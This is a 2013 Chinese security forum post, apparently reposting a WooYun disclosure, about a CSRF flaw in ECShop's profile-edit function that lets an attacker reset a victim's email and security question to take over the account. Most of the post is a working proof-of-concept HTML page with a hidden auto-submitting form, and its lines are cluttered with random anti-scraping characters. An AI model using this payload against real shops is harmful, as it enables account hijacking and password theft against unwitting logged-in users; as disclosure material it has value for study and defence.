找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:# Q6 K0 _/ G8 Z
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ R! [2 y; x3 D! h# f* ?" g$ _  i% D! A7 }
Demo For:http://www.wooyun.org/bug.php?action=view&id=395* N9 J# x7 O  _

: ^4 w! Q( v3 M  }; }详细说明:
$ M; U1 V' M& P6 `" P* l# H利用csrf和xss可以突破官方所说的“障碍”
9 J# {9 N6 Y; l5 Hxss版本已经有人说明: A! x9 p) g0 q( K8 Q
这里给出csrf版本/ _+ L; t1 O% |/ J3 b$ P

  I7 ^1 \0 ^' t& ~漏洞证明:" G  [+ y3 k1 O
<html>; \/ `/ A/ V2 D4 ]) g& m7 T
<body>& V2 ~9 G9 ^0 E/ ]! F4 _
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) ]0 M; p+ O% z; Y% q- i! x' P
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ r3 M0 |2 c0 j2 C$ C% Z% g<INPUT TYPE="text" NAME="act" value="act_edit_profile">; x, D3 f3 i# @* `1 ?' w
<INPUT TYPE="text" NAME="sel_question" value="ecshop">. N. ?& _) P. ]& Z% W7 N
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">1 g3 x# \4 H% q6 `( H
</body>
4 ^+ o0 k7 z" I; b# o<script>
  K4 c+ }0 H- m3 c0 Y: \% v1 T( Kdocument.forms[0].submit();" G- J% C# y* Z; w
</script>
* X. m, C2 n, S1 V% X' V</html>: D9 i; ]6 F# Z- Q$ Q7 J: ?
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
# G# t. r5 g) y& c# i& k" k9 M- h1 f. n3 h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表